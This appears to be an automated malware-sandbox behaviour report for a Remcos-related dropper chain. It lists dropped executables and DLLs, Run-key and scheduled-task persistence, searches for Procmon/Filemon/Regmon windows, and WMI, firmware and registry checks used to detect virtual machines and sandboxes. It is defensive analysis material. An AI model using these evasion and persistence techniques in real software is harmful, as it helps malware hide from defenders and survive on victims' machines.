Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\remcos_a[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsFHIEBKKFHI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\buildd[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	File created: C:\ProgramData\Remcos\remcos.exe	Jump to dropped file
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	File created: C:\ProgramData\Remcos\remcos.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsFHIEBKKFHI.exe

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 315ef68721.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ed55d3f620.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c2a8de8bf3.exe	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsFHIEBKKFHI.exe

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: RegmonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: Regmonclass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: Filemonclass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: RegmonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: RegmonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\Remcos\remcos.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ed55d3f620.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ed55d3f620.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c2a8de8bf3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c2a8de8bf3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 315ef68721.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 315ef68721.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
